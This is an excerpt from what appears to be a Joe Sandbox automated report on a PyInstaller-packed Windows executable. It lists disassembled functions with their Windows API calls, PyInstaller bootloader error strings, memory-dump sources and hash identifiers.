                                                                                                                                                                                                                                            • Part of subcall function 00007FF67AED2810: MessageBoxW.USER32 ref: 00007FF67AED28EA
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.3019440736.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019253519.00007FF67AED0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019597939.00007FF67AEFB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019759926.00007FF67AF0E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019759926.00007FF67AF12000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3020018200.00007FF67AF14000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff67aed0000_D1UL0FG.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ByteCharEnvironmentExpandMessageMultiStringsWide
                                                                                                                                                                                                                                          • String ID: %.*s$CreateDirectory$LOADER: failed to convert runtime-tmpdir to a wide string.$LOADER: failed to create runtime-tmpdir path %ls!$LOADER: failed to expand environment variables in the runtime-tmpdir.$LOADER: failed to obtain the absolute path of the runtime-tmpdir.$LOADER: runtime-tmpdir points to non-existent drive %ls (type: %d)!$\
                                                                                                                                                                                                                                          • API String ID: 1662231829-930877121
                                                                                                                                                                                                                                          • Opcode ID: e491f33a4545c5dc9e33b4da933e1c9d98f9a36929a11ac7b8a73595df86892f
                                                                                                                                                                                                                                          • Instruction ID: d0e97c873fbb4cc8c1bab014d2b7e853b1dfa67cc1ac6b105376c7bf38949823
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e491f33a4545c5dc9e33b4da933e1c9d98f9a36929a11ac7b8a73595df86892f
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C451D723A3D68285FB50BB24E8516BA6360EFD4784F544075E50EC66F5EE2CE505F740
                                                                                                                                                                                                                                          Function 00007FF67AED2180 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 120COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.3019440736.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019253519.00007FF67AED0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019597939.00007FF67AEFB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019759926.00007FF67AF0E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019759926.00007FF67AF12000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3020018200.00007FF67AF14000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff67aed0000_D1UL0FG.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: MoveWindow$ObjectSelect$DrawReleaseText
                                                                                                                                                                                                                                          • String ID: P%
                                                                                                                                                                                                                                          • API String ID: 2147705588-2959514604
                                                                                                                                                                                                                                          • Opcode ID: 044398bc2faddcfc72e28419b1c607044beef288ba0900b5e0371f537bcab75f
                                                                                                                                                                                                                                          • Instruction ID: a011452b26be41af9b5d829c9c31bdf55d01aef9534cbb0a8b0f9f6a792587c8
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 044398bc2faddcfc72e28419b1c607044beef288ba0900b5e0371f537bcab75f
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5751C637614BA186D6249F26F4181BAB7A1F798B61F004125EBDE83694EF3CD085DB10
                                                                                                                                                                                                                                          Function 00007FF67AED80B0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 67COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.3019440736.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019253519.00007FF67AED0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019597939.00007FF67AEFB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019759926.00007FF67AF0E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019759926.00007FF67AF12000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3020018200.00007FF67AF14000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff67aed0000_D1UL0FG.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: LongWindow$BlockCreateErrorLastReasonShutdown
                                                                                                                                                                                                                                          • String ID: Needs to remove its temporary files.
                                                                                                                                                                                                                                          • API String ID: 3975851968-2863640275
                                                                                                                                                                                                                                          • Opcode ID: 1b4b32be61da5f45784fe9fe2f7d724fb74bbaf2a32eb33803c40e4204126e7e
                                                                                                                                                                                                                                          • Instruction ID: a65f9136d1a16c7140162ca9e377ad537fb37e2896b002774264db9813120844
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1b4b32be61da5f45784fe9fe2f7d724fb74bbaf2a32eb33803c40e4204126e7e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4C21D323B28A42C6EB816B7AB8541796350EF88B91F5842B4DE6DC33F4EE2CD584D700
                                                                                                                                                                                                                                          Function 00007FF67AEE6300 Relevance: 14.5, APIs: 3, Strings: 5, Instructions: 494COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.3019440736.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019253519.00007FF67AED0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019597939.00007FF67AEFB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019759926.00007FF67AF0E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019759926.00007FF67AF12000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3020018200.00007FF67AF14000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff67aed0000_D1UL0FG.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                          • String ID: -$:$f$p$p
                                                                                                                                                                                                                                          • API String ID: 3215553584-2013873522
                                                                                                                                                                                                                                          • Opcode ID: 75ce3dd5e90789a751ac91fed3db50e3550f512a2f4dec46f6fb30c565ad9a60
                                                                                                                                                                                                                                          • Instruction ID: dd4dde16f49b3cd1f81474439cfa99d0b263006a46247afb9f0efd89d0bf18e9
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 75ce3dd5e90789a751ac91fed3db50e3550f512a2f4dec46f6fb30c565ad9a60
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3312B373F2C14386FB207B14E1542B97792FB40750F844575E68A876E8DF3DE990AB02
                                                                                                                                                                                                                                          Function 00007FF67AEE1038 Relevance: 14.5, APIs: 3, Strings: 5, Instructions: 475COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.3019440736.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019253519.00007FF67AED0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019597939.00007FF67AEFB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019759926.00007FF67AF0E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019759926.00007FF67AF12000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3020018200.00007FF67AF14000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff67aed0000_D1UL0FG.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                          • String ID: f$f$p$p$f
                                                                                                                                                                                                                                          • API String ID: 3215553584-1325933183
                                                                                                                                                                                                                                          • Opcode ID: efdc55b57c7b5823aa39a5abe82f144bbffe385c3037011f7a836833ec2ff017
                                                                                                                                                                                                                                          • Instruction ID: 9084b6d6669bec35a4d674902e9ef59caaa80b8d4c7509b288e5594446f99566
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: efdc55b57c7b5823aa39a5abe82f144bbffe385c3037011f7a836833ec2ff017
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 70128163E2C14386FB20BA55E4546BD73A1FBA0754F8840B5E699C7AE4DF7CE4C0AB40
                                                                                                                                                                                                                                          Function 00007FF67AED1050 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 119COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.3019440736.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019253519.00007FF67AED0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019597939.00007FF67AEFB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019759926.00007FF67AF0E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019759926.00007FF67AF12000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3020018200.00007FF67AF14000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff67aed0000_D1UL0FG.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CurrentProcess
                                                                                                                                                                                                                                          • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                                                                                                                                                                          • API String ID: 2050909247-3659356012
                                                                                                                                                                                                                                          • Opcode ID: 0c31251e6cc82c47abebe2306b4fb6df75d7e9a8de90183b667ac336f21b0774
                                                                                                                                                                                                                                          • Instruction ID: 68600170bdbe9025efe8ff0432ae1c7f95dc6771ec476c916f553586997551d6
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0c31251e6cc82c47abebe2306b4fb6df75d7e9a8de90183b667ac336f21b0774
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6741A163B2C65286FA10FB22A8006B96395FF84BC4F6444B5ED4D877A6DE3CE505E740
                                                                                                                                                                                                                                          Function 00007FF67AED1470 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 107COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.3019440736.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019253519.00007FF67AED0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019597939.00007FF67AEFB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019759926.00007FF67AF0E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019759926.00007FF67AF12000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3020018200.00007FF67AF14000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff67aed0000_D1UL0FG.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CurrentProcess
                                                                                                                                                                                                                                          • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                                                                                                                                                                          • API String ID: 2050909247-3659356012
                                                                                                                                                                                                                                          • Opcode ID: 5a016122ccacf22d2f40e2f4ad7ae1084c068073363954eaa92016f2cfc1e0a1
                                                                                                                                                                                                                                          • Instruction ID: 66be77be411398093f21bb916bc5d6cc1e10f5c733e724d9ff00923978f0fc58
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5a016122ccacf22d2f40e2f4ad7ae1084c068073363954eaa92016f2cfc1e0a1
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 38416F23B2868289FB10FB31A5405B96390FF84794F5449B6ED4D87BB5DE3CE541EB00
                                                                                                                                                                                                                                          Function 00007FF67AEDEA78 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 310COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.3019440736.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019253519.00007FF67AED0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019597939.00007FF67AEFB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019759926.00007FF67AF0E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019759926.00007FF67AF12000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3020018200.00007FF67AF14000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff67aed0000_D1UL0FG.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                                                                                                                                          • String ID: csm$csm$csm
                                                                                                                                                                                                                                          • API String ID: 849930591-393685449
                                                                                                                                                                                                                                          • Opcode ID: b3973e9ed2b821368333a922871466498bda8290f9160b5e7eff6497ccad0325
                                                                                                                                                                                                                                          • Instruction ID: decb345baaab07e76e92f07ece6ea74d53ec13f30e9aaf093586f3ea5cb877ab
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b3973e9ed2b821368333a922871466498bda8290f9160b5e7eff6497ccad0325
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 36D16D33A28741CAEB24EB25D4453AD37A0FB85798F200175EE8D97BA9DF38E581D700
                                                                                                                                                                                                                                          Function 00007FF67AED2C50 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 104windowCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF67AED3706,?,00007FF67AED3804), ref: 00007FF67AED2C9E
                                                                                                                                                                                                                                          • FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF67AED3706,?,00007FF67AED3804), ref: 00007FF67AED2D63
                                                                                                                                                                                                                                          • MessageBoxW.USER32 ref: 00007FF67AED2D99
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.3019440736.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019253519.00007FF67AED0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019597939.00007FF67AEFB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019759926.00007FF67AF0E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019759926.00007FF67AF12000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3020018200.00007FF67AF14000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff67aed0000_D1UL0FG.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Message$CurrentFormatProcess
                                                                                                                                                                                                                                          • String ID: %ls: $<FormatMessageW failed.>$Error$[PYI-%d:ERROR]
                                                                                                                                                                                                                                          • API String ID: 3940978338-251083826
                                                                                                                                                                                                                                          • Opcode ID: 5cbcdbf458937bec5e084182eea0cc5ea1ed3b872b1d9e6a561cbd57b4752a27
                                                                                                                                                                                                                                          • Instruction ID: b6a4aff4207acfc08c7b17e42b1ccb9ea619be30a6cd658304911a804c79d122
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5cbcdbf458937bec5e084182eea0cc5ea1ed3b872b1d9e6a561cbd57b4752a27
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9E31D233B18B4146E620BB25B8102AB66A5BFC8BC8F510136EF8DD3769EE3CD546D700
                                                                                                                                                                                                                                          Function 00007FF67AEDDD38 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • LoadLibraryExW.KERNEL32(?,?,?,00007FF67AEDDFEA,?,?,?,00007FF67AEDDCDC,?,?,?,00007FF67AEDD8D9), ref: 00007FF67AEDDDBD
                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,00007FF67AEDDFEA,?,?,?,00007FF67AEDDCDC,?,?,?,00007FF67AEDD8D9), ref: 00007FF67AEDDDCB
                                                                                                                                                                                                                                          • LoadLibraryExW.KERNEL32(?,?,?,00007FF67AEDDFEA,?,?,?,00007FF67AEDDCDC,?,?,?,00007FF67AEDD8D9), ref: 00007FF67AEDDDF5
                                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(?,?,?,00007FF67AEDDFEA,?,?,?,00007FF67AEDDCDC,?,?,?,00007FF67AEDD8D9), ref: 00007FF67AEDDE63
                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?,?,00007FF67AEDDFEA,?,?,?,00007FF67AEDDCDC,?,?,?,00007FF67AEDD8D9), ref: 00007FF67AEDDE6F
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.3019440736.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019253519.00007FF67AED0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019597939.00007FF67AEFB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019759926.00007FF67AF0E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019759926.00007FF67AF12000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3020018200.00007FF67AF14000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff67aed0000_D1UL0FG.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                                                                                                                                                          • String ID: api-ms-
                                                                                                                                                                                                                                          • API String ID: 2559590344-2084034818
                                                                                                                                                                                                                                          • Opcode ID: 7dacba43e0eeea41cb86842b35fa5572bc178a215ab50afad80fbb9160df823c
                                                                                                                                                                                                                                          • Instruction ID: b5f057513ad7c429baf6fe7236e841eaa1a2582cb6aaeadf118356a3fa000bc3
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7dacba43e0eeea41cb86842b35fa5572bc178a215ab50afad80fbb9160df823c
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C331C323F2B642D5EE62AB02A84057523D4FF98BA0F694575DD1E873A0EF3CE444E714
                                                                                                                                                                                                                                          Function 00007FF67AED6350 Relevance: 10.6, APIs: 1, Strings: 6, Instructions: 82COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.3019440736.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019253519.00007FF67AED0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019597939.00007FF67AEFB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019759926.00007FF67AF0E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019759926.00007FF67AF12000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3020018200.00007FF67AF14000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff67aed0000_D1UL0FG.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CurrentProcess
                                                                                                                                                                                                                                          • String ID: Failed to load Python DLL '%ls'.$LoadLibrary$Path of Python shared library (%s) and its name (%s) exceed buffer size (%d)$Path of ucrtbase.dll (%s) and its name exceed buffer size (%d)$Reported length (%d) of Python shared library name (%s) exceeds buffer size (%d)$ucrtbase.dll
                                                                                                                                                                                                                                          • API String ID: 2050909247-2434346643
                                                                                                                                                                                                                                          • Opcode ID: 5c7507e70d60f0fb7e3c9a3209df06ed2678ab3c183624e845013dd92edd1fac
                                                                                                                                                                                                                                          • Instruction ID: 371de4d3051e5fa0828b243f2b3739cad3ef787a7fcc830c3c5c8f456271bebf
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5c7507e70d60f0fb7e3c9a3209df06ed2678ab3c183624e845013dd92edd1fac
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7F417233A38A8691EA11FB24E4542E96321FFD4384FA00572EA5DC36E5EF3CE545D740
                                                                                                                                                                                                                                          Function 00007FF67AED2A50 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 64COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetCurrentProcessId.KERNEL32(00000000,?,?,?,00000000,00007FF67AED351A,?,00000000,00007FF67AED3F23), ref: 00007FF67AED2AA0
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.3019440736.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019253519.00007FF67AED0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019597939.00007FF67AEFB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019759926.00007FF67AF0E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019759926.00007FF67AF12000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3020018200.00007FF67AF14000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff67aed0000_D1UL0FG.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CurrentProcess
                                                                                                                                                                                                                                          • String ID: 0$WARNING$Warning$Warning [ANSI Fallback]$[PYI-%d:%s]
                                                                                                                                                                                                                                          • API String ID: 2050909247-2900015858
                                                                                                                                                                                                                                          • Opcode ID: 2c88a21be5af21f56a68c86fdca39687fee9058fd376c6caa55945c458c4d180
                                                                                                                                                                                                                                          • Instruction ID: 4377176696c53ce16cf0882ff76c75e658a25a1a24eddef29f3dccdfce8cf4f9
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2c88a21be5af21f56a68c86fdca39687fee9058fd376c6caa55945c458c4d180
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A2218173B2878186E660EB61F8417EA63A4FB887C4F400176EE8C97669DF3CD545D740
                                                                                                                                                                                                                                          Function 00007FF67AEEB1C0 Relevance: 10.6, APIs: 7, Instructions: 62COMMONLIBRARYCODE
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.3019440736.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019253519.00007FF67AED0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019597939.00007FF67AEFB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019759926.00007FF67AF0E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019759926.00007FF67AF12000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3020018200.00007FF67AF14000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff67aed0000_D1UL0FG.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Value$ErrorLast
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2506987500-0
